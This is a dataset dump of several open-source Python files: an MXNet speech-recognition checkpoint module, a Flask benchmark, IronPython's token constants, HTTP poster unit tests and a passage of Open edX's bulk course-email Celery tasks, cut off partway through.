repo_name (stringlengths 5–100) | ref (stringlengths 12–67) | path (stringlengths 4–244) | copies (stringlengths 1–8) | content (stringlengths 0–1.05M ⌀)
---|---|---|---|---|
crazy-cat/incubator-mxnet | refs/heads/master | example/speech_recognition/stt_bucketing_module.py | 52 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import mxnet as mx
class STTBucketingModule(mx.mod.BucketingModule):
def save_checkpoint(self, prefix, epoch, save_optimizer_states=False):
symbol, data_names, label_names = self._sym_gen(self._default_bucket_key)
symbol.save('%s-symbol.json' % prefix)
param_name = '%s-%04d.params' % (prefix, epoch)
self.save_params(param_name)
if save_optimizer_states:
state_name = '%s-%04d.states' % (prefix, epoch)
self._curr_module.save_optimizer_states(state_name)
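
# --- Editorial usage sketch (not part of the upstream file) ---
# A minimal illustration of how the override above is typically exercised.
# `sym_gen`, `default_bucket_key`, and the bind/fit steps are assumptions here;
# mx.mod.BucketingModule requires them, but they are defined elsewhere.
def _example_save_checkpoint(sym_gen, default_bucket_key, prefix='stt_model', epoch=10):
    """Save a trained STTBucketingModule so it can be reloaded later."""
    module = STTBucketingModule(sym_gen, default_bucket_key=default_bucket_key,
                                context=mx.cpu())
    # ... module.bind(...) and module.fit(...) would run here ...
    module.save_checkpoint(prefix, epoch, save_optimizer_states=True)
    # Produces: <prefix>-symbol.json, <prefix>-<epoch:04d>.params and, if requested,
    # <prefix>-<epoch:04d>.states.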
|
whiteclover/solo | refs/heads/master | benchmark/flaskb.py | 1 |
from flask import Flask
app = Flask(__name__)
@app.route("/")
def hello():
return "Hello World!"
if __name__ == '__main__':
from gevent.wsgi import WSGIServer
http_server = WSGIServer(('', 8080), app, log=None)
http_server.serve_forever() |
jstammers/EDMSuite | refs/heads/atom-mega-mix | NavPython/IronPython/Lib/token.py | 178 | #! /usr/bin/env python
"""Token constants (from "token.h")."""
# This file is automatically generated; please don't muck it up!
#
# To update the symbols in this file, 'cd' to the top directory of
# the python source tree after building the interpreter and run:
#
# python Lib/token.py
#--start constants--
ENDMARKER = 0
NAME = 1
NUMBER = 2
STRING = 3
NEWLINE = 4
INDENT = 5
DEDENT = 6
LPAR = 7
RPAR = 8
LSQB = 9
RSQB = 10
COLON = 11
COMMA = 12
SEMI = 13
PLUS = 14
MINUS = 15
STAR = 16
SLASH = 17
VBAR = 18
AMPER = 19
LESS = 20
GREATER = 21
EQUAL = 22
DOT = 23
PERCENT = 24
BACKQUOTE = 25
LBRACE = 26
RBRACE = 27
EQEQUAL = 28
NOTEQUAL = 29
LESSEQUAL = 30
GREATEREQUAL = 31
TILDE = 32
CIRCUMFLEX = 33
LEFTSHIFT = 34
RIGHTSHIFT = 35
DOUBLESTAR = 36
PLUSEQUAL = 37
MINEQUAL = 38
STAREQUAL = 39
SLASHEQUAL = 40
PERCENTEQUAL = 41
AMPEREQUAL = 42
VBAREQUAL = 43
CIRCUMFLEXEQUAL = 44
LEFTSHIFTEQUAL = 45
RIGHTSHIFTEQUAL = 46
DOUBLESTAREQUAL = 47
DOUBLESLASH = 48
DOUBLESLASHEQUAL = 49
AT = 50
OP = 51
ERRORTOKEN = 52
N_TOKENS = 53
NT_OFFSET = 256
#--end constants--
tok_name = {}
for _name, _value in globals().items():
if type(_value) is type(0):
tok_name[_value] = _name
del _name, _value
def ISTERMINAL(x):
return x < NT_OFFSET
def ISNONTERMINAL(x):
return x >= NT_OFFSET
def ISEOF(x):
return x == ENDMARKER
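
# Editorial sanity-check sketch (not part of the generated file): a tiny,
# self-contained illustration of how tok_name and the predicates above relate.
def _example_token_queries():
    """Show the reverse mapping and the terminal/non-terminal split."""
    assert tok_name[NAME] == 'NAME'
    assert ISTERMINAL(NAME) and not ISNONTERMINAL(NAME)
    assert ISNONTERMINAL(NT_OFFSET)
    assert ISEOF(ENDMARKER)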
def main():
import re
import sys
args = sys.argv[1:]
inFileName = args and args[0] or "Include/token.h"
outFileName = "Lib/token.py"
if len(args) > 1:
outFileName = args[1]
try:
fp = open(inFileName)
except IOError, err:
sys.stdout.write("I/O error: %s\n" % str(err))
sys.exit(1)
lines = fp.read().split("\n")
fp.close()
prog = re.compile(
"#define[ \t][ \t]*([A-Z0-9][A-Z0-9_]*)[ \t][ \t]*([0-9][0-9]*)",
re.IGNORECASE)
tokens = {}
for line in lines:
match = prog.match(line)
if match:
name, val = match.group(1, 2)
val = int(val)
tokens[val] = name # reverse so we can sort them...
keys = tokens.keys()
keys.sort()
# load the output skeleton from the target:
try:
fp = open(outFileName)
except IOError, err:
sys.stderr.write("I/O error: %s\n" % str(err))
sys.exit(2)
format = fp.read().split("\n")
fp.close()
try:
start = format.index("#--start constants--") + 1
end = format.index("#--end constants--")
except ValueError:
sys.stderr.write("target does not contain format markers")
sys.exit(3)
lines = []
for val in keys:
lines.append("%s = %d" % (tokens[val], val))
format[start:end] = lines
try:
fp = open(outFileName, 'w')
except IOError, err:
sys.stderr.write("I/O error: %s\n" % str(err))
sys.exit(4)
fp.write("\n".join(format))
fp.close()
if __name__ == "__main__":
main()
|
pdc/dozup | refs/heads/master | tests/test_poster.py | 1 | # -*- coding: UTF-8 -*-
from __future__ import unicode_literals
import io
import json
import shutil
import tempfile
import unittest
import httpretty
from dozup import DozupPoster, DozupError
class PosterTestMixin(unittest.TestCase):
status_code = 202
endpoint_uri = 'http://example.com/drop/'
content_type = 'application/json'
content = json.dumps({'status': 'OK'})
def setUp(self):
super(PosterTestMixin, self).setUp()
self.dir_path = tempfile.mkdtemp('.test', 'DozupQueueTests.')
self.poster = DozupPoster('http://example.com/drop/')
def tearDown(self):
shutil.rmtree(self.dir_path)
super(PosterTestMixin, self).tearDown()
def given_server_endpoint(self, content=None, content_type=None):
httpretty.register_uri(
httpretty.POST, self.endpoint_uri,
status=self.status_code,
content_type=(content_type or self.content_type),
body=(content or self.content))
def when_posting(self, file_name='name_of_file.txt', file_content=b'content of file'):
strm = io.BytesIO(file_content)
self.result = self.poster.post(file_name, strm)
def then_error_should_be(self, expected):
self.assertFalse(self.result)
self.assertEqual(DozupError(self.status_code, expected), self.poster.errors[-1])
class PosterCreatedTests(PosterTestMixin, unittest.TestCase):
status_code = 201
@httpretty.activate
def test_post_one_file(self):
self.given_server_endpoint()
self.when_posting(file_content=b'this is the message content')
self.assertTrue(self.result)
self.assertEqual(b'this is the message content', httpretty.last_request().body)
self.assertEqual(b'POST', httpretty.last_request().method)
self.assertEqual(b'/drop/', httpretty.last_request().path)
class PosterOKTests(PosterCreatedTests):
status_code = 201
class PosterAcceptedTests(PosterCreatedTests):
status_code = 202
class PosterUnreadyTests(PosterTestMixin, unittest.TestCase):
status_code = 503
status_reason = 'Service Unavailable'
content_type = 'application/json'
@httpretty.activate
def test_retains_plain_text_error_message(self):
self.given_server_endpoint('Sorry!', 'text/plain')
self.when_posting()
self.then_error_should_be('Sorry!')
@httpretty.activate
def test_retains_json_error_string(self):
self.given_server_endpoint('{"error": "Not today, thank you!"}')
self.when_posting()
self.then_error_should_be('Not today, thank you!')
@httpretty.activate
def test_retains_json_error_object(self):
self.given_server_endpoint('{"errors": [{"message": "Not today, thank you!"}]}')
self.when_posting()
self.then_error_should_be({"message": "Not today, thank you!"})
@httpretty.activate
def test_synthesizes_error_message_from_status_code_if_it_must(self):
self.given_server_endpoint('{"flange": "heliotrope"}')
self.when_posting()
self.then_error_should_be(self.status_reason)
class PosterNotFoundTests(PosterUnreadyTests):
status_code = 404
status_reason = 'Not Found'
class PosterForbiddenTests(PosterUnreadyTests):
status_code = 403
status_reason = 'Forbidden'
class PosterInternalServerErrorTests(PosterUnreadyTests):
status_code = 500
status_reason = 'Internal Server Error'
class HalPosterUnreadyTests(PosterUnreadyTests):
content_type = 'application/hal+json'
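
# Editorial sketch (not part of the original suite): the mixin pattern above makes new
# status codes a one-line subclass. The 429 case below is hypothetical, added only to
# illustrate how the shared given/when/then helpers are reused.
class PosterTooManyRequestsTests(PosterUnreadyTests):
    status_code = 429
    status_reason = 'Too Many Requests'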
|
chand3040/cloud_that | refs/heads/named-release/cypress.rc | lms/djangoapps/bulk_email/tasks.py | 29 | # -*- coding: utf-8 -*-
"""
This module contains celery task functions for handling the sending of bulk email
to a course.
"""
import re
import random
import json
from time import sleep
from collections import Counter
import logging
import dogstats_wrapper as dog_stats_api
from smtplib import SMTPServerDisconnected, SMTPDataError, SMTPConnectError, SMTPException
from boto.ses.exceptions import (
SESAddressNotVerifiedError,
SESIdentityNotVerifiedError,
SESDomainNotConfirmedError,
SESAddressBlacklistedError,
SESDailyQuotaExceededError,
SESMaxSendingRateExceededError,
SESDomainEndsWithDotError,
SESLocalAddressCharacterError,
SESIllegalAddressError,
)
from boto.exception import AWSConnectionError
from celery import task, current_task
from celery.states import SUCCESS, FAILURE, RETRY
from celery.exceptions import RetryTaskError
from django.conf import settings
from django.contrib.auth.models import User
from django.core.mail import EmailMultiAlternatives, get_connection
from django.core.urlresolvers import reverse
from bulk_email.models import (
CourseEmail, Optout,
SEND_TO_MYSELF, SEND_TO_ALL, TO_OPTIONS,
SEND_TO_STAFF,
)
from courseware.courses import get_course, course_image_url
from student.roles import CourseStaffRole, CourseInstructorRole
from instructor_task.models import InstructorTask
from instructor_task.subtasks import (
SubtaskStatus,
queue_subtasks_for_query,
check_subtask_is_valid,
update_subtask_status,
)
from util.query import use_read_replica_if_available
from util.date_utils import get_default_time_display
log = logging.getLogger('edx.celery.task')
# Errors that indicate an individual email failed to send, and should just
# be treated as a failure.
SINGLE_EMAIL_FAILURE_ERRORS = (
SESAddressBlacklistedError, # Recipient's email address has been temporarily blacklisted.
SESDomainEndsWithDotError, # Recipient's email address' domain ends with a period/dot.
SESIllegalAddressError, # Raised when an illegal address is encountered.
SESLocalAddressCharacterError, # An address contained a control or whitespace character.
)
# Exceptions that, if caught, should cause the task to be re-tried.
# These errors will be caught a limited number of times before the task fails.
LIMITED_RETRY_ERRORS = (
SMTPConnectError,
SMTPServerDisconnected,
AWSConnectionError,
)
# Errors that indicate that a mailing task should be retried without limit.
# An example is if email is being sent too quickly, but may succeed if sent
# more slowly. When caught by a task, it triggers an exponential backoff and retry.
# Retries happen continuously until the email is sent.
# Note that the SMTPDataErrors here are only those within the 4xx range.
# Those not in this range (i.e. in the 5xx range) are treated as hard failures
# and thus like SINGLE_EMAIL_FAILURE_ERRORS.
INFINITE_RETRY_ERRORS = (
SESMaxSendingRateExceededError, # Your account's requests/second limit has been exceeded.
SMTPDataError,
)
# Errors that are known to indicate an inability to send any more emails,
# and should therefore not be retried. For example, exceeding a quota for emails.
# Also, any SMTP errors that are not explicitly enumerated above.
BULK_EMAIL_FAILURE_ERRORS = (
SESAddressNotVerifiedError, # Raised when a "Reply-To" address has not been validated in SES yet.
SESIdentityNotVerifiedError, # Raised when an identity has not been verified in SES yet.
SESDomainNotConfirmedError, # Raised when domain ownership is not confirmed for DKIM.
SESDailyQuotaExceededError, # 24-hour allotment of outbound email has been exceeded.
SMTPException,
)
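
# Editorial sketch (not part of the upstream module): a small helper showing how the
# tuples above partition exceptions into retry policies. The string labels are
# illustrative only; the real dispatch happens inline in _send_course_email below,
# which additionally special-cases SMTPDataError by SMTP code (4xx retried, 5xx failed).
def _classify_send_error(exc):
    """Map an exception instance onto the retry policy implied by the error tuples."""
    if isinstance(exc, SINGLE_EMAIL_FAILURE_ERRORS):
        return 'fail-single-recipient'   # count one failure and move on
    if isinstance(exc, INFINITE_RETRY_ERRORS):
        return 'retry-without-max'       # exponential backoff, no max-retry check
    if isinstance(exc, LIMITED_RETRY_ERRORS):
        return 'retry-with-max'          # counted against max_retries
    if isinstance(exc, BULK_EMAIL_FAILURE_ERRORS):
        return 'fail-subtask'            # no point retrying the whole batch
    return 'retry-with-max'              # unexpected errors also get a limited retry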
def _get_recipient_querysets(user_id, to_option, course_id):
"""
Returns a list of query sets of email recipients corresponding to the
requested `to_option` category.
`to_option` is either SEND_TO_MYSELF, SEND_TO_STAFF, or SEND_TO_ALL.
Recipients who are in more than one category (e.g. enrolled in the course
and are staff or self) will be properly deduped.
"""
if to_option not in TO_OPTIONS:
log.error("Unexpected bulk email TO_OPTION found: %s", to_option)
raise Exception("Unexpected bulk email TO_OPTION found: {0}".format(to_option))
if to_option == SEND_TO_MYSELF:
user = User.objects.filter(id=user_id)
return [use_read_replica_if_available(user)]
else:
staff_qset = CourseStaffRole(course_id).users_with_role()
instructor_qset = CourseInstructorRole(course_id).users_with_role()
staff_instructor_qset = (staff_qset | instructor_qset).distinct()
if to_option == SEND_TO_STAFF:
return [use_read_replica_if_available(staff_instructor_qset)]
if to_option == SEND_TO_ALL:
# We also require students to have activated their accounts to
# provide verification that the provided email address is valid.
enrollment_qset = User.objects.filter(
is_active=True,
courseenrollment__course_id=course_id,
courseenrollment__is_active=True
)
# to avoid duplicates, we only want to email unenrolled course staff
# members here
unenrolled_staff_qset = staff_instructor_qset.exclude(
courseenrollment__course_id=course_id, courseenrollment__is_active=True
)
# use read_replica if available
recipient_qsets = [
use_read_replica_if_available(unenrolled_staff_qset),
use_read_replica_if_available(enrollment_qset),
]
return recipient_qsets
def _get_course_email_context(course):
"""
Returns context arguments to apply to all emails, independent of recipient.
"""
course_id = course.id.to_deprecated_string()
course_title = course.display_name
course_end_date = get_default_time_display(course.end)
course_url = 'https://{}{}'.format(
settings.SITE_NAME,
reverse('course_root', kwargs={'course_id': course_id})
)
image_url = u'https://{}{}'.format(settings.SITE_NAME, course_image_url(course))
email_context = {
'course_title': course_title,
'course_url': course_url,
'course_image_url': image_url,
'course_end_date': course_end_date,
'account_settings_url': 'https://{}{}'.format(settings.SITE_NAME, reverse('account_settings')),
'platform_name': settings.PLATFORM_NAME,
}
return email_context
def perform_delegate_email_batches(entry_id, course_id, task_input, action_name):
"""
Delegates emails by querying for the list of recipients who should
get the mail, chopping it up into batches of no more than settings.BULK_EMAIL_EMAILS_PER_TASK
in size, and queueing up worker jobs.
"""
entry = InstructorTask.objects.get(pk=entry_id)
# Get inputs to use in this task from the entry.
user_id = entry.requester.id
task_id = entry.task_id
# Perfunctory check, since expansion is made for convenience of other task
# code that doesn't need the entry_id.
if course_id != entry.course_id:
format_msg = u"Course id conflict: explicit value %r does not match task value %r"
log.warning(u"Task %s: " + format_msg, task_id, course_id, entry.course_id)
raise ValueError(format_msg % (course_id, entry.course_id))
# Fetch the CourseEmail.
email_id = task_input['email_id']
try:
email_obj = CourseEmail.objects.get(id=email_id)
except CourseEmail.DoesNotExist:
# The CourseEmail object should be committed in the view function before the task
# is submitted and reaches this point.
log.warning(u"Task %s: Failed to get CourseEmail with id %s", task_id, email_id)
raise
# Check to see if email batches have already been defined. This seems to
# happen sometimes when there is a loss of connection while a task is being
# queued. When this happens, the same task gets called again, and a whole
# new raft of subtasks gets queued up. We will assume that if subtasks
# have already been defined, there is no need to redefine them below.
# So we just return right away. We don't raise an exception, because we want
# the current task to be marked with whatever it had been marked with before.
if len(entry.subtasks) > 0 and len(entry.task_output) > 0:
log.warning(u"Task %s has already been processed for email %s! InstructorTask = %s", task_id, email_id, entry)
progress = json.loads(entry.task_output)
return progress
# Sanity check that course for email_obj matches that of the task referencing it.
if course_id != email_obj.course_id:
format_msg = u"Course id conflict: explicit value %r does not match email value %r"
log.warning(u"Task %s: " + format_msg, task_id, course_id, email_obj.course_id)
raise ValueError(format_msg % (course_id, email_obj.course_id))
# Fetch the course object.
course = get_course(course_id)
if course is None:
msg = u"Task %s: course not found: %s"
log.error(msg, task_id, course_id)
raise ValueError(msg % (task_id, course_id))
# Get arguments that will be passed to every subtask.
to_option = email_obj.to_option
global_email_context = _get_course_email_context(course)
recipient_qsets = _get_recipient_querysets(user_id, to_option, course_id)
recipient_fields = ['profile__name', 'email']
log.info(u"Task %s: Preparing to queue subtasks for sending emails for course %s, email %s, to_option %s",
task_id, course_id, email_id, to_option)
total_recipients = sum([recipient_queryset.count() for recipient_queryset in recipient_qsets])
routing_key = settings.BULK_EMAIL_ROUTING_KEY
# if there are few enough emails, send them through a different queue
# to avoid large courses blocking emails to self and staff
if total_recipients <= settings.BULK_EMAIL_JOB_SIZE_THRESHOLD:
routing_key = settings.BULK_EMAIL_ROUTING_KEY_SMALL_JOBS
def _create_send_email_subtask(to_list, initial_subtask_status):
"""Creates a subtask to send email to a given recipient list."""
subtask_id = initial_subtask_status.task_id
new_subtask = send_course_email.subtask(
(
entry_id,
email_id,
to_list,
global_email_context,
initial_subtask_status.to_dict(),
),
task_id=subtask_id,
routing_key=routing_key,
)
return new_subtask
progress = queue_subtasks_for_query(
entry,
action_name,
_create_send_email_subtask,
recipient_qsets,
recipient_fields,
settings.BULK_EMAIL_EMAILS_PER_TASK,
total_recipients,
)
# We want to return progress here, as this is what will be stored in the
# AsyncResult for the parent task as its return value.
# The AsyncResult will then be marked as SUCCEEDED, and have this return value as its "result".
# That's okay, for the InstructorTask will have the "real" status, and monitoring code
# should be using that instead.
return progress
@task(default_retry_delay=settings.BULK_EMAIL_DEFAULT_RETRY_DELAY, max_retries=settings.BULK_EMAIL_MAX_RETRIES) # pylint: disable=not-callable
def send_course_email(entry_id, email_id, to_list, global_email_context, subtask_status_dict):
"""
Sends an email to a list of recipients.
Inputs are:
* `entry_id`: id of the InstructorTask object to which progress should be recorded.
* `email_id`: id of the CourseEmail model that is to be emailed.
* `to_list`: list of recipients. Each is represented as a dict with the following keys:
- 'profile__name': full name of User.
- 'email': email address of User.
- 'pk': primary key of User model.
* `global_email_context`: dict containing values that are unique for this email but the same
for all recipients of this email. This dict is to be used to fill in slots in email
template. It does not include 'name' and 'email', which will be provided by the to_list.
* `subtask_status_dict` : dict containing values representing current status. Keys are:
'task_id' : id of subtask. This is used to pass task information across retries.
'attempted' : number of attempts -- should equal succeeded plus failed
'succeeded' : number that succeeded in processing
'skipped' : number that were not processed.
'failed' : number that failed during processing
'retried_nomax' : number of times the subtask has been retried for conditions that
should not have a maximum count applied
'retried_withmax' : number of times the subtask has been retried for conditions that
should have a maximum count applied
'state' : celery state of the subtask (e.g. QUEUING, PROGRESS, RETRY, FAILURE, SUCCESS)
Most values will be zero on initial call, but may be different when the task is
invoked as part of a retry.
Sends to all addresses contained in to_list that are not also in the Optout table.
Emails are sent multi-part, in both plain text and html. Updates InstructorTask object
with status information (sends, failures, skips) and updates number of subtasks completed.
"""
subtask_status = SubtaskStatus.from_dict(subtask_status_dict)
current_task_id = subtask_status.task_id
num_to_send = len(to_list)
log.info(u"Preparing to send email %s to %d recipients as subtask %s for instructor task %d: context = %s, status=%s",
email_id, num_to_send, current_task_id, entry_id, global_email_context, subtask_status)
# Check that the requested subtask is actually known to the current InstructorTask entry.
# If this fails, it throws an exception, which should fail this subtask immediately.
# This can happen when the parent task has been run twice, and results in duplicate
# subtasks being created for the same InstructorTask entry. This can happen when Celery
# loses its connection to its broker, and any current tasks get requeued.
# We hope to catch this condition in perform_delegate_email_batches() when it's the parent
# task that is resubmitted, but just in case we fail to do so there, we check here as well.
# There is also a possibility that this task will be run twice by Celery, for the same reason.
# To deal with that, we need to confirm that the task has not already been completed.
check_subtask_is_valid(entry_id, current_task_id, subtask_status)
send_exception = None
new_subtask_status = None
try:
course_title = global_email_context['course_title']
with dog_stats_api.timer('course_email.single_task.time.overall', tags=[_statsd_tag(course_title)]):
new_subtask_status, send_exception = _send_course_email(
entry_id,
email_id,
to_list,
global_email_context,
subtask_status,
)
except Exception:
# Unexpected exception. Try to write out the failure to the entry before failing.
log.exception("Send-email task %s for email %s: failed unexpectedly!", current_task_id, email_id)
# We got here for really unexpected reasons. Since we don't know how far
# the task got in emailing, we count all recipients as having failed.
# It at least keeps the counts consistent.
subtask_status.increment(failed=num_to_send, state=FAILURE)
update_subtask_status(entry_id, current_task_id, subtask_status)
raise
if send_exception is None:
# Update the InstructorTask object that is storing its progress.
log.info("Send-email task %s for email %s: succeeded", current_task_id, email_id)
update_subtask_status(entry_id, current_task_id, new_subtask_status)
elif isinstance(send_exception, RetryTaskError):
# If retrying, a RetryTaskError needs to be returned to Celery.
# We assume that the progress made before the retry condition
# was encountered has already been updated before the retry call was made,
# so we only log here.
log.warning("Send-email task %s for email %s: being retried", current_task_id, email_id)
raise send_exception # pylint: disable=raising-bad-type
else:
log.error("Send-email task %s for email %s: failed: %s", current_task_id, email_id, send_exception)
update_subtask_status(entry_id, current_task_id, new_subtask_status)
raise send_exception # pylint: disable=raising-bad-type
# return status in a form that can be serialized by Celery into JSON:
log.info("Send-email task %s for email %s: returning status %s", current_task_id, email_id, new_subtask_status)
return new_subtask_status.to_dict()
def _filter_optouts_from_recipients(to_list, course_id):
"""
Filters a recipient list based on student opt-outs for a given course.
Returns the filtered recipient list, as well as the number of optouts
removed from the list.
"""
optouts = Optout.objects.filter(
course_id=course_id,
user__in=[i['pk'] for i in to_list]
).values_list('user__email', flat=True)
optouts = set(optouts)
# Only count the num_optout for the first time the optouts are calculated.
# We assume that the number will not change on retries, and so we don't need
# to calculate it each time.
num_optout = len(optouts)
to_list = [recipient for recipient in to_list if recipient['email'] not in optouts]
return to_list, num_optout
def _get_source_address(course_id, course_title):
"""
Calculates an email address to be used as the 'from-address' for sent emails.
Makes a unique from name and address for each course, e.g.
"COURSE_TITLE" Course Staff <[email protected]>
"""
course_title_no_quotes = re.sub(r'"', '', course_title)
# For the email address, get the course. Then make sure that it can be used
# in an email address, by substituting a '_' anywhere a character other than a
# letter, digit, underscore, period, or dash appears.
from_addr = u'"{0}" Course Staff <{1}-{2}>'.format(
course_title_no_quotes,
re.sub(r"[^\w.-]", '_', course_id.course),
settings.BULK_EMAIL_DEFAULT_FROM_EMAIL
)
return from_addr
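
# Editorial illustration (not part of the upstream module): the same formatting logic as
# above, applied to made-up inputs so the resulting shape is easy to see. The course id,
# title, and from-email below are hypothetical.
def _example_source_address():
    """Show the from-address shape produced by the formatting used above."""
    title_no_quotes = re.sub(r'"', '', u'Intro to "Widgets"')
    addr = u'"{0}" Course Staff <{1}-{2}>'.format(
        title_no_quotes,
        re.sub(r"[^\w.-]", '_', u'CS101/2x'),
        u'no-reply@example.com',
    )
    # addr == u'"Intro to Widgets" Course Staff <CS101_2x-no-reply@example.com>'
    return addr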
def _send_course_email(entry_id, email_id, to_list, global_email_context, subtask_status):
"""
Performs the email sending task.
Sends an email to a list of recipients.
Inputs are:
* `entry_id`: id of the InstructorTask object to which progress should be recorded.
* `email_id`: id of the CourseEmail model that is to be emailed.
* `to_list`: list of recipients. Each is represented as a dict with the following keys:
- 'profile__name': full name of User.
- 'email': email address of User.
- 'pk': primary key of User model.
* `global_email_context`: dict containing values that are unique for this email but the same
for all recipients of this email. This dict is to be used to fill in slots in email
template. It does not include 'name' and 'email', which will be provided by the to_list.
* `subtask_status` : object of class SubtaskStatus representing current status.
Sends to all addresses contained in to_list that are not also in the Optout table.
Emails are sent multi-part, in both plain text and html.
Returns a tuple of two values:
* First value is a SubtaskStatus object which represents current progress at the end of this call.
* Second value is an exception returned by the innards of the method, indicating a fatal error.
In this case, the number of recipients that were not sent have already been added to the
'failed' count above.
"""
# Get information from current task's request:
parent_task_id = InstructorTask.objects.get(pk=entry_id).task_id
task_id = subtask_status.task_id
total_recipients = len(to_list)
recipient_num = 0
total_recipients_successful = 0
total_recipients_failed = 0
recipients_info = Counter()
log.info(
"BulkEmail ==> Task: %s, SubTask: %s, EmailId: %s, TotalRecipients: %s",
parent_task_id,
task_id,
email_id,
total_recipients
)
try:
course_email = CourseEmail.objects.get(id=email_id)
except CourseEmail.DoesNotExist as exc:
log.exception(
"BulkEmail ==> Task: %s, SubTask: %s, EmailId: %s, Could not find email to send.",
parent_task_id,
task_id,
email_id
)
raise
# Exclude optouts (if not a retry):
# Note that we don't have to do the optout logic at all if this is a retry,
# because we have presumably already performed the optout logic on the first
# attempt. Anyone on the to_list on a retry has already passed the filter
# that existed at that time, and we don't need to keep checking for changes
# in the Optout list.
if subtask_status.get_retry_count() == 0:
to_list, num_optout = _filter_optouts_from_recipients(to_list, course_email.course_id)
subtask_status.increment(skipped=num_optout)
course_title = global_email_context['course_title']
# use the email from address in the CourseEmail, if it is present, otherwise compute it
from_addr = course_email.from_addr if course_email.from_addr else \
_get_source_address(course_email.course_id, course_title)
# use the CourseEmailTemplate that was associated with the CourseEmail
course_email_template = course_email.get_template()
try:
connection = get_connection()
connection.open()
# Define context values to use in all course emails:
email_context = {'name': '', 'email': ''}
email_context.update(global_email_context)
while to_list:
# Update context with user-specific values from the user at the end of the list.
# At the end of processing this user, they will be popped off of the to_list.
# That way, the to_list will always contain the recipients remaining to be emailed.
# This is convenient for retries, which will need to send to those who haven't
# yet been emailed, but not send to those who have already been sent to.
recipient_num += 1
current_recipient = to_list[-1]
email = current_recipient['email']
email_context['email'] = email
email_context['name'] = current_recipient['profile__name']
email_context['user_id'] = current_recipient['pk']
email_context['course_id'] = course_email.course_id
# Construct message content using templates and context:
plaintext_msg = course_email_template.render_plaintext(course_email.text_message, email_context)
html_msg = course_email_template.render_htmltext(course_email.html_message, email_context)
# Create email:
email_msg = EmailMultiAlternatives(
course_email.subject,
plaintext_msg,
from_addr,
[email],
connection=connection
)
email_msg.attach_alternative(html_msg, 'text/html')
# Throttle if we have hit the rate limiter. This is not very high-tech,
# but if a task has been retried for rate-limiting reasons, then we sleep
# for a period of time between all emails within this task. Choice of
# the value depends on the number of workers that might be sending email in
# parallel, and what the SES throttle rate is.
if subtask_status.retried_nomax > 0:
sleep(settings.BULK_EMAIL_RETRY_DELAY_BETWEEN_SENDS)
try:
log.info(
"BulkEmail ==> Task: %s, SubTask: %s, EmailId: %s, Recipient num: %s/%s, \
Recipient name: %s, Email address: %s",
parent_task_id,
task_id,
email_id,
recipient_num,
total_recipients,
current_recipient['profile__name'],
email
)
with dog_stats_api.timer('course_email.single_send.time.overall', tags=[_statsd_tag(course_title)]):
connection.send_messages([email_msg])
except SMTPDataError as exc:
# According to SMTP spec, we'll retry error codes in the 4xx range. 5xx range indicates hard failure.
total_recipients_failed += 1
log.error(
"BulkEmail ==> Status: Failed(SMTPDataError), Task: %s, SubTask: %s, EmailId: %s, \
Recipient num: %s/%s, Email address: %s",
parent_task_id,
task_id,
email_id,
recipient_num,
total_recipients,
email
)
if exc.smtp_code >= 400 and exc.smtp_code < 500:
# This will cause the outer handler to catch the exception and retry the entire task.
raise exc
else:
# This will fall through and not retry the message.
log.warning(
'BulkEmail ==> Task: %s, SubTask: %s, EmailId: %s, Recipient num: %s/%s, \
Email not delivered to %s due to error %s',
parent_task_id,
task_id,
email_id,
recipient_num,
total_recipients,
email,
exc.smtp_error
)
dog_stats_api.increment('course_email.error', tags=[_statsd_tag(course_title)])
subtask_status.increment(failed=1)
except SINGLE_EMAIL_FAILURE_ERRORS as exc:
# This will fall through and not retry the message.
total_recipients_failed += 1
log.error(
"BulkEmail ==> Status: Failed(SINGLE_EMAIL_FAILURE_ERRORS), Task: %s, SubTask: %s, \
EmailId: %s, Recipient num: %s/%s, Email address: %s, Exception: %s",
parent_task_id,
task_id,
email_id,
recipient_num,
total_recipients,
email,
exc
)
dog_stats_api.increment('course_email.error', tags=[_statsd_tag(course_title)])
subtask_status.increment(failed=1)
else:
total_recipients_successful += 1
log.info(
"BulkEmail ==> Status: Success, Task: %s, SubTask: %s, EmailId: %s, \
Recipient num: %s/%s, Email address: %s,",
parent_task_id,
task_id,
email_id,
recipient_num,
total_recipients,
email
)
dog_stats_api.increment('course_email.sent', tags=[_statsd_tag(course_title)])
if settings.BULK_EMAIL_LOG_SENT_EMAILS:
log.info('Email with id %s sent to %s', email_id, email)
else:
log.debug('Email with id %s sent to %s', email_id, email)
subtask_status.increment(succeeded=1)
# Pop the user that was emailed off the end of the list only once they have
# successfully been processed. (That way, if there were a failure that
# needed to be retried, the user is still on the list.)
recipients_info[email] += 1
to_list.pop()
log.info(
"BulkEmail ==> Task: %s, SubTask: %s, EmailId: %s, Total Successful Recipients: %s/%s, \
Failed Recipients: %s/%s",
parent_task_id,
task_id,
email_id,
total_recipients_successful,
total_recipients,
total_recipients_failed,
total_recipients
)
duplicate_recipients = ["{0} ({1})".format(email, repetition)
for email, repetition in recipients_info.most_common() if repetition > 1]
if duplicate_recipients:
log.info(
"BulkEmail ==> Task: %s, SubTask: %s, EmailId: %s, Total Duplicate Recipients [%s]: [%s]",
parent_task_id,
task_id,
email_id,
len(duplicate_recipients),
', '.join(duplicate_recipients)
)
except INFINITE_RETRY_ERRORS as exc:
dog_stats_api.increment('course_email.infinite_retry', tags=[_statsd_tag(course_title)])
# Increment the "retried_nomax" counter, update other counters with progress to date,
# and set the state to RETRY:
subtask_status.increment(retried_nomax=1, state=RETRY)
return _submit_for_retry(
entry_id, email_id, to_list, global_email_context, exc, subtask_status, skip_retry_max=True
)
except LIMITED_RETRY_ERRORS as exc:
# Errors caught here cause the email to be retried. The entire task is actually retried
# without popping the current recipient off of the existing list.
# Errors caught are those that indicate a temporary condition that might succeed on retry.
dog_stats_api.increment('course_email.limited_retry', tags=[_statsd_tag(course_title)])
# Increment the "retried_withmax" counter, update other counters with progress to date,
# and set the state to RETRY:
subtask_status.increment(retried_withmax=1, state=RETRY)
return _submit_for_retry(
entry_id, email_id, to_list, global_email_context, exc, subtask_status, skip_retry_max=False
)
except BULK_EMAIL_FAILURE_ERRORS as exc:
